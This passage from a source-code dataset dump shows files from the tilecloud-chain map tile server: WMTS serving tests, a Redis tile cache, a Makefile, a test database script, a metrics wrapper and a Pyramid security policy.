self.assertEqual(request.response.headers[\"Cache-Control\"], \"max-age=28800\")\n\n request.matchdict[\"path\"][7] = \"12\"\n assert isinstance(serve(), HTTPNoContent)\n\n request.matchdict[\"path\"][7] = \"11\"\n request.matchdict[\"path\"][1] = \"0.9\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.matchdict[\"path\"][1] = \"1.0.0\"\n request.matchdict[\"path\"][8] = \"14.jpeg\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.matchdict[\"path\"][8] = \"14.png\"\n request.matchdict[\"path\"][2] = \"test\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.matchdict[\"path\"][2] = \"point_hash\"\n request.matchdict[\"path\"][3] = \"test\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.matchdict[\"path\"][3] = \"default\"\n request.matchdict[\"path\"][5] = \"test\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.matchdict[\"path\"] = [\"wmts\", \"point_hash\", \"default\", \"swissgrid_5\", \"1\", \"14\", \"11.png\"]\n self.assertRaises(HTTPBadRequest, serve)\n\n request.matchdict[\"path\"] = [\"wmts\", \"1.0.0\", \"WMTSCapabilities.xml\"]\n PyramidView(request)()\n self.assertEqual(request.response.headers[\"Content-Type\"], \"application/xml\")\n self.assert_result_equals(\n request.response.body.decode(\"utf-8\"),\n CAPABILITIES,\n regex=True,\n )\n\n request.matchdict[\"path\"] = [\"static\", \"1.0.0\", \"WMTSCapabilities.xml\"]\n PyramidView(request)()\n self.assertEqual(request.response.headers[\"Content-Type\"], \"application/xml\")\n self.assert_result_equals(\n request.response.body.decode(\"utf-8\"),\n CAPABILITIES,\n regex=True,\n )\n\n log_capture.check()\n\n def test_serve_gfi(self) -> None:\n server.pyramid_server = None\n server.tilegeneration = None\n request = DummyRequest()\n request.registry.settings = {\n \"tilegeneration_configfile\": \"tilegeneration/test-serve.yaml\",\n }\n request.params = {\n \"Service\": \"WMTS\",\n \"Version\": \"1.0.0\",\n \"Request\": \"GetFeatureInfo\",\n \"Format\": \"image/png\",\n 
\"Info_Format\": \"application/vnd.ogc.gml\",\n \"Layer\": \"point_hash\",\n \"Query_Layer\": \"point_hash\",\n \"Style\": \"default\",\n \"TileMatrixSet\": \"swissgrid_5\",\n \"TileMatrix\": \"1\",\n \"TileRow\": \"11\",\n \"TileCol\": \"14\",\n \"I\": \"114\",\n \"J\": \"111\",\n }\n serve = PyramidView(request)\n serve()\n self.assert_result_equals(\n request.response.body.decode(\"utf-8\"),\n \"\"\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<msGMLOutput\n xmlns:gml=\"http://www.opengis.net/gml\"\n xmlns:xlink=\"http://www.w3.org/1999/xlink\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\n</msGMLOutput>\n\"\"\",\n )\n\n server.pyramid_server = None\n server.tilegeneration = None\n request = DummyRequest()\n request.registry.settings = {\n \"tilegeneration_configfile\": \"tilegeneration/test-serve.yaml\",\n }\n request.matchdict = {\n \"path\": [\n \"wmts\",\n \"1.0.0\",\n \"point_hash\",\n \"default\",\n \"2012\",\n \"swissgrid_5\",\n \"1\",\n \"11\",\n \"14\",\n \"114\",\n \"111.xml\",\n ]\n }\n request.params = {\n \"Service\": \"WMTS\",\n \"Version\": \"1.0.0\",\n \"Request\": \"GetFeatureInfo\",\n \"Format\": \"image/png\",\n \"Info_Format\": \"application/vnd.ogc.gml\",\n \"Layer\": \"point_hash\",\n \"Query_Layer\": \"point_hash\",\n \"Style\": \"default\",\n \"TileMatrixSet\": \"swissgrid_5\",\n \"TileMatrix\": \"1\",\n \"TileRow\": \"14\",\n \"TileCol\": \"11\",\n \"I\": \"114\",\n \"J\": \"111\",\n }\n serve = PyramidView(request)\n serve()\n self.assert_result_equals(\n request.response.body.decode(\"utf-8\"),\n \"\"\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<msGMLOutput\n xmlns:gml=\"http://www.opengis.net/gml\"\n xmlns:xlink=\"http://www.w3.org/1999/xlink\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\n</msGMLOutput>\n\"\"\",\n )\n\n def test_wsgi(self) -> None:\n tile_mbt = os.environ[\"TILE_NB_THREAD\"]\n metatile_mbt = os.environ[\"METATILE_NB_THREAD\"]\n os.environ[\"TILE_NB_THREAD\"] = \"1\"\n os.environ[\"METATILE_NB_THREAD\"] = \"1\"\n\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles -d -c tilegeneration/test-serve.yaml \"\n \"-l point_hash --zoom 1\",\n main_func=generate.main,\n directory=\"/tmp/tiles/mbtiles/\",\n tiles_pattern=\"1.0.0/%s\",\n tiles=[(\"point_hash/default/2012/swissgrid_5.png.mbtiles\")],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'point_hash \\(DATE=2012\\)' is finish\nNb generated metatiles: 1\nNb metatiles dropped: 0\nNb generated tiles: 64\nNb tiles dropped: 62\nNb tiles stored: 2\nNb tiles in error: 0\nTotal time: [0-9]+:[0-9][0-9]:[0-9][0-9]\nTotal size: [89][0-9][0-9] o\nTime per tile: [0-9]+ ms\nSize per tile: 4[0-9][0-9] o\n\n\"\"\",\n )\n\n server.pyramid_server = None\n server.tilegeneration = None\n serve = app_factory({}, configfile=\"tilegeneration/test-serve.yaml\")\n\n global code, headers\n code = None\n headers = None\n\n def start_response(p_code, p_headers):\n global code, headers\n code = p_code\n headers = {}\n for key, value in p_headers:\n headers[key] = value\n\n result = serve(\n server.tilegeneration.get_main_config(),\n \"tilegeneration/test-serve.yaml\",\n {\n \"QUERY_STRING\": \"&\".join(\n [\n \"{}={}\".format(*item)\n for item in {\n \"Service\": \"WMTS\",\n \"Version\": \"1.0.0\",\n \"Request\": \"GetFeatureInfo\",\n \"Format\": \"image/png\",\n \"Info_Format\": \"application/vnd.ogc.gml\",\n \"Layer\": \"point_hash\",\n \"Query_Layer\": \"point_hash\",\n \"Style\": \"default\",\n \"TileMatrixSet\": \"swissgrid_5\",\n \"TileMatrix\": \"1\",\n 
\"TileRow\": \"11\",\n \"TileCol\": \"14\",\n \"I\": \"114\",\n \"J\": \"111\",\n }.items()\n ]\n )\n },\n start_response,\n )\n self.assertEqual(code, \"200 OK\")\n self.assert_result_equals(\n result[0].decode(\"utf-8\"),\n \"\"\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<msGMLOutput\n xmlns:gml=\"http://www.opengis.net/gml\"\n xmlns:xlink=\"http://www.w3.org/1999/xlink\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\n</msGMLOutput>\n\"\"\",\n )\n\n result = serve(\n server.tilegeneration.get_main_config(),\n \"tilegeneration/test-serve.yaml\",\n {\n \"QUERY_STRING\": \"\",\n \"PATH_INFO\": \"/wmts/1.0.0/point_hash/default/2012/swissgrid_5/1/14/11/114/111.xml\",\n },\n start_response,\n )\n self.assert_result_equals(\n result[0].decode(\"utf-8\"),\n \"\"\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<msGMLOutput\n xmlns:gml=\"http://www.opengis.net/gml\"\n xmlns:xlink=\"http://www.w3.org/1999/xlink\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\n</msGMLOutput>\n\"\"\",\n )\n\n serve(\n server.tilegeneration.get_main_config(),\n \"tilegeneration/test-serve.yaml\",\n {\"QUERY_STRING\": \"\", \"PATH_INFO\": \"/wmts/1.0.0/point_hash/default/2012/swissgrid_5/1/11/12.png\"},\n start_response,\n )\n self.assertEqual(code, \"204 No Content\")\n\n serve(\n server.tilegeneration.get_main_config(),\n \"tilegeneration/test-serve.yaml\",\n {\"QUERY_STRING\": \"\", \"PATH_INFO\": \"/wmts/1.0.0/point_hash/default/2012/swissgrid_5/1/11/14.png\"},\n start_response,\n )\n self.assertEqual(code, \"200 OK\")\n self.assertEqual(headers[\"Cache-Control\"], \"max-age=28800\")\n\n result = serve(\n server.tilegeneration.get_main_config(),\n \"tilegeneration/test-serve.yaml\",\n {\"QUERY_STRING\": \"\", \"PATH_INFO\": \"/wmts/1.0.0/WMTSCapabilities.xml\"},\n start_response,\n )\n self.assertEqual(code, \"200 OK\")\n self.assert_result_equals(\n result[0].decode(\"utf-8\"),\n CAPABILITIES,\n regex=True,\n )\n\n os.environ[\"TILE_NB_THREAD\"] = tile_mbt\n os.environ[\"METATILE_NB_THREAD\"] = metatile_mbt\n\n def test_ondemend_wmtscapabilities(self) -> None:\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n server.pyramid_server = None\n server.tilegeneration = None\n request = DummyRequest()\n request.registry.settings = {\n \"tilegeneration_configfile\": \"tilegeneration/test-serve-wmtscapabilities.yaml\",\n }\n request.matchdict[\"path\"] = [\"wmts\", \"1.0.0\", \"WMTSCapabilities.xml\"]\n PyramidView(request)()\n self.assertEqual(request.response.headers[\"Content-Type\"], \"application/xml\")\n self.assert_result_equals(\n request.response.body.decode(\"utf-8\"),\n CAPABILITIES,\n regex=True,\n )\n log_capture.check()\n" }, { "alpha_fraction": 0.5760483145713806, "alphanum_fraction": 0.5779436230659485, "avg_line_length": 34.322174072265625, "blob_id": "815b62e6ffc5435d90d58d8c1726bc2ba1ed1f32", "content_id": "2718f87ceefc58ebbd7557a89a4b1036ec80de3d", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8442, "license_type": "permissive", "max_line_length": 107, "num_lines": 239, "path": "/tilecloud_chain/internal_mapcache.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import collections\nimport contextlib\nimport datetime\nimport json\nimport logging\nimport os\nimport struct\nimport sys\nimport threading\nfrom typing import TYPE_CHECKING, Any, Dict, Iterator, Optional, TypeVar, cast\n\nimport redis.sentinel\n\nimport tilecloud_chain.configuration\nfrom 
tilecloud import Tile, TileCoord, TileStore\nfrom tilecloud_chain import Run\nfrom tilecloud_chain.generate import Generate\n\nif TYPE_CHECKING:\n from tilecloud_chain.server import Server\n\nMAX_GENERATION_TIME = 60\nLOG = logging.getLogger(__name__)\nlock = threading.Lock()\nexecuting_lock = threading.Lock()\n_generator = None\n\n\ndef _decode_tile(data: bytes, tile: Tile) -> None:\n \"\"\"Decode a tile.\"\"\"\n image_len = struct.unpack(\"q\", data[:8])[0]\n tile.data = data[8 : (image_len + 8)]\n other = json.loads((data[(8 + image_len) :]).decode(\"utf-8\"))\n tile.content_encoding = other[\"content_encoding\"]\n tile.content_type = other[\"content_type\"]\n\n\ndef _encode_tile(tile: Tile) -> bytes:\n \"\"\"Encode a tile.\"\"\"\n other = {\"content_encoding\": tile.content_encoding, \"content_type\": tile.content_type}\n assert tile.data\n data = struct.pack(\"q\", len(tile.data)) + tile.data + json.dumps(other).encode(\"utf-8\")\n return data\n\n\nclass RedisStore(TileStore):\n \"\"\"A store based on Redis.\"\"\"\n\n def __init__(self, config: tilecloud_chain.configuration.Redis, **kwargs: Any):\n \"\"\"Initialize.\"\"\"\n super().__init__(**kwargs)\n\n connection_kwargs = {}\n if \"socket_timeout\" in config:\n connection_kwargs[\"socket_timeout\"] = config[\"socket_timeout\"]\n if \"db\" in config:\n connection_kwargs[\"db\"] = config[\"db\"]\n if \"url\" in config:\n self._master = redis.Redis.from_url(config[\"url\"], **connection_kwargs) # type: ignore\n self._slave = self._master\n else:\n sentinels = [(host, int(port)) for host, port in config[\"sentinels\"]]\n sentinel = redis.sentinel.Sentinel(sentinels, **connection_kwargs) # type: ignore\n self._master = sentinel.master_for(config.get(\"service_name\", \"mymaster\"))\n self._slave = sentinel.slave_for(config.get(\"service_name\", \"mymaster\"))\n self._prefix = config[\"prefix\"]\n self._expiration = config[\"expiration\"]\n\n def get_one(self, tile: Tile) -> Optional[Tile]:\n \"\"\"See in superclass.\"\"\"\n key = self._get_key(tile)\n data = self._slave.get(key)\n if data is None:\n LOG.debug(\"Tile not found: %s/%s\", tile.metadata[\"layer\"], tile.tilecoord)\n return None\n _decode_tile(data, tile)\n LOG.debug(\"Tile found: %s/%s\", tile.metadata[\"layer\"], tile.tilecoord)\n return tile\n\n def put_one(self, tile: Tile) -> Tile:\n \"\"\"See in superclass.\"\"\"\n key = self._get_key(tile)\n self._master.set(key, _encode_tile(tile), ex=self._expiration)\n LOG.info(\"Tile saved: %s/%s\", tile.metadata[\"layer\"], tile.tilecoord)\n return tile\n\n def delete_one(self, tile: Tile) -> Tile:\n \"\"\"See in superclass.\"\"\"\n key = self._get_key(tile)\n self._master.delete(key)\n return tile\n\n def _get_key(self, tile: Tile) -> str:\n return (\n f\"{self._prefix}_{tile.metadata['config_file']}_{tile.metadata['layer']}_\"\n f\"{tile.tilecoord.z}_{tile.tilecoord.x}_{tile.tilecoord.y}\"\n )\n\n @contextlib.contextmanager\n def lock(self, tile: Tile) -> Iterator[None]:\n \"\"\"Lock a tile.\"\"\"\n key = self._get_key(tile) + \"_l\"\n with self._master.lock(key, timeout=MAX_GENERATION_TIME):\n yield\n\n\nclass Generator:\n \"\"\"Get the tile from the cache (Redis) or generated it on the WMS server.\"\"\"\n\n def __init__(self, tilegeneration: tilecloud_chain.TileGeneration) -> None:\n \"\"\"Initialize.\"\"\"\n redis_config = tilegeneration.get_main_config().config[\"redis\"]\n self._cache_store = RedisStore(redis_config)\n log_level = os.environ.get(\"TILE_MAPCACHE_LOGLEVEL\")\n generator = Generate(\n collections.namedtuple( # 
type: ignore\n \"Options\",\n [\n \"verbose\",\n \"debug\",\n \"quiet\",\n \"role\",\n \"near\",\n \"time\",\n \"daemon\",\n \"local_process_number\",\n \"tiles\",\n ],\n )(\n log_level == \"verbose\", # type: ignore\n log_level == \"debug\",\n log_level == \"quiet\",\n \"server\",\n True,\n False,\n True,\n None,\n None,\n ),\n tilegeneration,\n out=sys.stdout,\n server=True,\n )\n generator._generate_tiles()\n self.run = Run(tilegeneration, tilegeneration.functions_metatiles)\n\n def read_from_cache(self, tile: Tile) -> Optional[Tile]:\n \"\"\"Get the tile from the cache (Redis).\"\"\"\n return self._cache_store.get_one(tile)\n\n def compute_tile(self, tile: Tile) -> None:\n \"\"\"Create the tile.\"\"\"\n self.run(tile)\n for tile_ in tile.metadata[\"tiles\"].values(): # type: ignore\n self._cache_store.put_one(tile_)\n\n @contextlib.contextmanager\n def lock(self, tile: Tile) -> Iterator[None]:\n \"\"\"Lock the tile.\"\"\"\n with self._cache_store.lock(tile):\n yield\n\n\ndef _get_generator(tilegeneration: tilecloud_chain.TileGeneration) -> Generator:\n if _generator is None:\n return _init_generator(tilegeneration)\n return _generator\n\n\ndef _init_generator(tilegeneration: tilecloud_chain.TileGeneration) -> Generator:\n with lock:\n global _generator # pylint: disable=global-statement\n if _generator is None:\n _generator = Generator(tilegeneration)\n return _generator\n\n\nResponse = TypeVar(\"Response\")\n\n\ndef fetch(\n config: tilecloud_chain.DatedConfig,\n server: \"Server[Response]\",\n tilegeneration: tilecloud_chain.TileGeneration,\n layer: tilecloud_chain.configuration.Layer,\n tile: Tile,\n kwargs: Dict[str, Any],\n) -> Response:\n \"\"\"Fetch a time in the cache (redis) or get it on the WMS server.\"\"\"\n generator = _get_generator(tilegeneration)\n fetched_tile = generator.read_from_cache(tile)\n backend = \"redis\"\n if fetched_tile is None:\n backend = \"wms-wait\"\n\n tile.metadata.setdefault(\"tiles\", {}) # type: ignore\n meta_tile = tile\n if layer[\"meta\"]:\n meta_tile = Tile(\n tilecoord=tile.tilecoord.metatilecoord(layer[\"meta_size\"]), metadata=tile.metadata\n )\n\n with generator.lock(meta_tile):\n fetched_tile = generator.read_from_cache(tile)\n if fetched_tile is None:\n backend = \"wms-generate\"\n generator.compute_tile(meta_tile)\n\n if meta_tile.error:\n LOG.error(\"Tile '%s' in error: %s\", meta_tile.tilecoord, meta_tile.error)\n return server.error(config, 500, \"Error while generate the tile, see logs for details\")\n\n # Don't fetch the just generated tile\n tiles: Dict[TileCoord, Tile] = cast(Dict[TileCoord, Tile], meta_tile.metadata[\"tiles\"])\n try:\n fetched_tile = tiles[tile.tilecoord]\n except KeyError:\n LOG.exception(\n \"Try to get the tile '%s', from the available: '%s'\",\n tile.tilecoord,\n \", \".join([str(e) for e in tiles.keys()]),\n )\n raise\n\n response_headers = {\n \"Expires\": (\n datetime.datetime.utcnow() + datetime.timedelta(hours=server.get_expires_hours(config))\n ).isoformat(),\n \"Cache-Control\": f\"max-age={3600 * server.get_expires_hours(config)}\",\n \"Access-Control-Allow-Origin\": \"*\",\n \"Access-Control-Allow-Methods\": \"GET\",\n \"Tile-Backend\": backend,\n }\n if fetched_tile.content_encoding:\n response_headers[\"Content-Encoding\"] = fetched_tile.content_encoding\n if fetched_tile.content_type:\n response_headers[\"Content-Type\"] = fetched_tile.content_type\n assert fetched_tile.data is not None\n return server.response(config, fetched_tile.data, headers=response_headers, **kwargs)\n" }, { 
"alpha_fraction": 0.6935807466506958, "alphanum_fraction": 0.7066198587417603, "avg_line_length": 32.79661178588867, "blob_id": "0969579e326d1ceb091e872c1e17ab4387c6d515", "content_id": "8ca29f355ba60092aecc3729324a754e8d172304", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 1994, "license_type": "permissive", "max_line_length": 124, "num_lines": 59, "path": "/Makefile", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "export DOCKER_BUILDKIT=1\nVERSION = $(strip $(shell poetry version --short))\n\n.PHONY: help\nhelp: ## Display this help message\n\t@echo \"Usage: make <target>\"\n\t@echo\n\t@echo \"Available targets:\"\n\t@grep --extended-regexp --no-filename '^[a-zA-Z_-]+:.*## ' $(MAKEFILE_LIST) | sort | \\\n\t\tawk 'BEGIN {FS = \":.*?## \"}; {printf \"\t%-20s%s\\n\", $$1, $$2}'\n\nPHONY: build\nbuild: ## Build all Docker images\n\tdocker build --tag=camptocamp/tilecloud-chain-tests --target=tests .\n\tdocker build --tag=camptocamp/tilecloud-chain --build-arg=VERSION=$(VERSION) .\n\nPHONY: checks\nchecks: prospector ## Run the checks\n\nPHONY: prospector\nprospector: ## Run Prospector\n\tdocker run --rm --volume=${PWD}:/app camptocamp/tilecloud-chain-tests prospector --output-format=pylint --die-on-tool-error\n\nPHONY: tests\ntests: build ## Run the unit tests\n\tdocker-compose stop --timeout=0\n\tdocker-compose down || true\n\tC2C_AUTH_GITHUB_CLIENT_ID=$(shell gopass show gs/projects/github/oauth-apps/geoservices-int/client-id) \\\n\tC2C_AUTH_GITHUB_CLIENT_SECRET=$(shell gopass show gs/projects/github/oauth-apps/geoservices-int/client-secret) \\\n\tdocker-compose up -d\n\n\t# Wait for DB to be up\n\twhile ! docker-compose exec -T test psql -h db -p 5432 -U postgres -v ON_ERROR_STOP=1 -c \"SELECT 1\" -d tests; \\\n\tdo \\\n\t\techo \"Waiting for DB to be UP\"; \\\n\t\tsleep 1; \\\n\tdone\n\n\tc2cciutils-docker-logs\n\n\tdocker-compose exec -T test pytest -vv --color=yes\n\n\tc2cciutils-docker-logs\n\tdocker-compose down\n\nPHONY: tests-fast\ntests-fast:\n\tC2C_AUTH_GITHUB_CLIENT_ID=$(shell gopass show gs/projects/github/oauth-apps/geoservices-int/client-id) \\\n\tC2C_AUTH_GITHUB_CLIENT_SECRET=$(shell gopass show gs/projects/github/oauth-apps/geoservices-int/client-secret) \\\n\tdocker-compose up -d\n\n\t# Wait for DB to be up\n\twhile ! 
docker-compose exec -T test psql -h db -p 5432 -U postgres -v ON_ERROR_STOP=1 -c \"SELECT 1\" -d tests; \\\n\tdo \\\n\t\techo \"Waiting for DB to be UP\"; \\\n\t\tsleep 1; \\\n\tdone\n\n\tdocker-compose exec -T test pytest -vv --color=yes --exitfirst #--last-failed\n" }, { "alpha_fraction": 0.6752577424049377, "alphanum_fraction": 0.6958763003349304, "avg_line_length": 37.79999923706055, "blob_id": "bcf4377104ebcfc8474ac590f4ab3b2109b06e90", "content_id": "5fb3306d5bf94020819b147f0380264fa58648eb", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 194, "license_type": "permissive", "max_line_length": 67, "num_lines": 5, "path": "/tilecloud_chain/tests/create_test_data.sh", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "#!/bin/bash -e\n\ncreatedb -E UTF8 -T template0 tests-deploy\npsql -q -d tests-deploy -c \"CREATE TABLE test (name varchar(10));\"\npsql -q -d tests-deploy -c \"INSERT INTO test VALUES ('referance');\"\n" }, { "alpha_fraction": 0.5783772468566895, "alphanum_fraction": 0.5794392228126526, "avg_line_length": 33.36496353149414, "blob_id": "36f54ef43cfe80e1997a09d31d7dd28135cf5449", "content_id": "08a440e3403318aed00df337b2c1aa8473a7fe97", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4708, "license_type": "permissive", "max_line_length": 110, "num_lines": 137, "path": "/tilecloud_chain/timedtilestore.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import time\nfrom typing import Any, Iterable, Iterator, Optional, TypeVar, cast\n\nfrom prometheus_client import Summary\n\nfrom tilecloud import BoundingPyramid, Tile, TileStore\n\n_OPTIONAL_TILE_OR_NOT = TypeVar(\"_OPTIONAL_TILE_OR_NOT\", Optional[Tile], Tile)\n\n_TILESTORE_OPERATION_SUMMARY = Summary(\n \"tilecloud_chain_tilestore\", \"Number of tilestore contains\", [\"layer\", \"host\", \"store\", \"operation\"]\n)\n_LEN_SUMMARY = Summary(\"tilecloud_chain_tilestore_len\", \"Number of tilestore len\", [\"store\"])\n\n\nclass TimedTileStoreWrapper(TileStore):\n \"\"\"A wrapper around a TileStore that adds timer metrics.\"\"\"\n\n def __init__(self, tile_store: TileStore, store_name: str) -> None:\n \"\"\"Initialize.\"\"\"\n super().__init__()\n self._tile_store = tile_store\n self._store_name = store_name\n\n def _time_iteration(\n self, generator: Iterable[_OPTIONAL_TILE_OR_NOT], operation: str\n ) -> Iterator[_OPTIONAL_TILE_OR_NOT]:\n while True:\n start = time.perf_counter()\n try:\n tile = next(generator) # type: ignore\n except StopIteration:\n break\n except RuntimeError as exception:\n if isinstance(exception.__cause__, StopIteration):\n # since python 3.7, a StopIteration is wrapped in a RuntimeError (PEP 479)\n break\n else:\n raise\n _TILESTORE_OPERATION_SUMMARY.labels(\n tile.metadata.get(\"layer\", \"none\"),\n tile.metadata.get(\"host\", \"none\"),\n self._store_name,\n operation,\n ).observe(time.perf_counter() - start)\n yield tile\n\n def __contains__(self, tile: Tile) -> bool:\n \"\"\"See in superclass.\"\"\"\n\n with _TILESTORE_OPERATION_SUMMARY.labels(\n tile.metadata.get(\"layer\", \"none\"),\n tile.metadata.get(\"host\", \"none\"),\n self._store_name,\n \"contains\",\n ).time():\n return self._tile_store.__contains__(tile)\n\n def __len__(self) -> int:\n \"\"\"See in superclass.\"\"\"\n\n with _LEN_SUMMARY.labels(\n self._store_name,\n ).time():\n return self._tile_store.__len__()\n\n def delete(self, 
tiles: Iterable[Tile]) -> Iterator[Tile]:\n \"\"\"See in superclass.\"\"\"\n\n return self._time_iteration(self._tile_store.delete(tiles), \"delete\")\n\n def delete_one(self, tile: Tile) -> Tile:\n \"\"\"See in superclass.\"\"\"\n\n with _TILESTORE_OPERATION_SUMMARY.labels(\n tile.metadata.get(\"layer\", \"none\"),\n tile.metadata.get(\"host\", \"none\"),\n self._store_name,\n \"delete_one\",\n ).time():\n return self._tile_store.delete_one(tile)\n\n def list(self) -> Iterable[Tile]:\n \"\"\"See in superclass.\"\"\"\n\n return cast(Iterable[Tile], self._time_iteration(self._tile_store.list(), \"list\"))\n\n def get(self, tiles: Iterable[Optional[Tile]]) -> Iterator[Optional[Tile]]:\n \"\"\"See in superclass.\"\"\"\n\n return self._time_iteration(self._tile_store.get(tiles), \"get\")\n\n def get_all(self) -> Iterator[Optional[Tile]]:\n \"\"\"See in superclass.\"\"\"\n\n return self._time_iteration(self._tile_store.get_all(), \"get_all\")\n\n def get_one(self, tile: Tile) -> Optional[Tile]:\n \"\"\"See in superclass.\"\"\"\n\n with _TILESTORE_OPERATION_SUMMARY.labels(\n tile.metadata.get(\"layer\", \"none\"), tile.metadata.get(\"host\", \"none\"), self._store_name, \"get_one\"\n ).time():\n return self._tile_store.get_one(tile)\n\n def put(self, tiles: Iterable[Tile]) -> Iterator[Tile]:\n \"\"\"See in superclass.\"\"\"\n\n return cast(Iterator[Tile], self._time_iteration(self._tile_store.put(tiles), \"put\"))\n\n def put_one(self, tile: Tile) -> Tile:\n \"\"\"See in superclass.\"\"\"\n\n with _TILESTORE_OPERATION_SUMMARY.labels(\n tile.metadata.get(\"layer\", \"none\"), tile.metadata.get(\"host\", \"none\"), self._store_name, \"put_one\"\n ).time():\n return self._tile_store.put_one(tile)\n\n def __getattr__(self, item: str) -> Any:\n \"\"\"See in superclass.\"\"\"\n\n return getattr(self._tile_store, item)\n\n def get_bounding_pyramid(self) -> BoundingPyramid:\n \"\"\"See in superclass.\"\"\"\n\n return self._tile_store.get_bounding_pyramid()\n\n def get_cheap_bounding_pyramid(self) -> Optional[BoundingPyramid]:\n \"\"\"See in superclass.\"\"\"\n\n return self._tile_store.get_cheap_bounding_pyramid()\n\n def __str__(self) -> str:\n \"\"\"Get string representation.\"\"\"\n\n return f\"tilecloud_chain.timedtilestore.TimedTileStoreWrapper: {self._tile_store}\"\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 15, "blob_id": "16255ff45d698b069346ce280d2e70fddc88e9b9", "content_id": "1c586ae8b16d22e4fbd4c415d0dce08e1166eaea", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 48, "license_type": "permissive", "max_line_length": 24, "num_lines": 3, "path": "/.coveragerc", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "[run]\nsource = tilecloud_chain\nomit = */tests/*\n" }, { "alpha_fraction": 0.5558080077171326, "alphanum_fraction": 0.5586481094360352, "avg_line_length": 31.302751541137695, "blob_id": "91f78becc5d1298dc0e9dfba16e32a6420495b4f", "content_id": "7b94b6a4384410167d9f668c1f31b9d96faf3bca", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3521, "license_type": "permissive", "max_line_length": 100, "num_lines": 109, "path": "/tilecloud_chain/security.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import os\nfrom typing import Optional, Union\n\nimport c2cwsgiutils.auth\nimport pyramid.request\nfrom c2cwsgiutils.auth import 
AuthConfig\nfrom pyramid.security import Allowed, Denied\n\n\nclass User:\n \"\"\"The user definition.\"\"\"\n\n login: Optional[str]\n name: Optional[str]\n url: Optional[str]\n is_auth: bool\n token: Optional[str]\n is_admin: bool\n request: pyramid.request.Request\n\n def __init__(\n self,\n auth_type: str,\n login: Optional[str],\n name: Optional[str],\n url: Optional[str],\n is_auth: bool,\n token: Optional[str],\n request: pyramid.request.Request,\n ) -> None:\n self.auth_type = auth_type\n self.login = login\n self.name = name\n self.url = url\n self.is_auth = is_auth\n self.token = token\n self.request = request\n self.is_admin = c2cwsgiutils.auth.check_access(self.request)\n\n def has_access(self, auth_config: AuthConfig) -> bool:\n if self.is_admin:\n return True\n if \"github_repository\" in auth_config:\n return c2cwsgiutils.auth.check_access_config(self.request, auth_config) or self.is_admin\n\n return False\n\n\nclass SecurityPolicy:\n \"\"\"The pyramid security policy.\"\"\"\n\n def identity(self, request: pyramid.request.Request) -> User:\n \"\"\"Return app-specific user object.\"\"\"\n\n if not hasattr(request, \"user\"):\n if \"TEST_USER\" in os.environ:\n user = User(\n auth_type=\"test_user\",\n login=os.environ[\"TEST_USER\"],\n name=os.environ[\"TEST_USER\"],\n url=\"https://example.com/user\",\n is_auth=True,\n token=None,\n request=request,\n )\n else:\n is_auth, c2cuser = c2cwsgiutils.auth.is_auth_user(request)\n user = User(\n \"github_oauth\",\n c2cuser.get(\"login\"),\n c2cuser.get(\"name\"),\n c2cuser.get(\"url\"),\n is_auth,\n c2cuser.get(\"token\"),\n request,\n )\n setattr(request, \"user\", user)\n return request.user # type: ignore\n\n def authenticated_userid(self, request: pyramid.request.Request) -> Optional[str]:\n \"\"\"Return a string ID for the user.\"\"\"\n\n identity = self.identity(request)\n\n if identity is None:\n return None\n\n return identity.login\n\n def permits(\n self, request: pyramid.request.Request, context: AuthConfig, permission: str\n ) -> Union[Allowed, Denied]:\n \"\"\"Allow access to everything if signed in.\"\"\"\n\n identity = self.identity(request)\n\n if identity is None:\n return Denied(\"User is not signed in.\")\n if identity.auth_type in (\"test_user\",):\n return Allowed(f\"All access auth type: {identity.auth_type}\")\n if identity.is_admin:\n return Allowed(\"The User is admin.\")\n if permission == \"all\":\n return Denied(\"Root access is required.\")\n if permission not in context.get(\"sources\", {}): # type: ignore\n return Denied(f\"No such source '{permission}'.\")\n if identity.has_access(context[\"sources\"][permission]): # type: ignore\n return Allowed(f\"The User has access to source {permission}.\")\n return Denied(f\"The User has no access to source {permission}.\")\n" }, { "alpha_fraction": 0.3037698268890381, "alphanum_fraction": 0.36838191747665405, "avg_line_length": 44.869937896728516, "blob_id": "aa84733ff3567de87bf596411d3291806a295950", "content_id": "851c30cc817455e895dc07766de511a41700334e", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21513, "license_type": "permissive", "max_line_length": 109, "num_lines": 469, "path": "/tilecloud_chain/tests/test_cost.py", "repo_name": "camptocamp/tilecloud-chain", 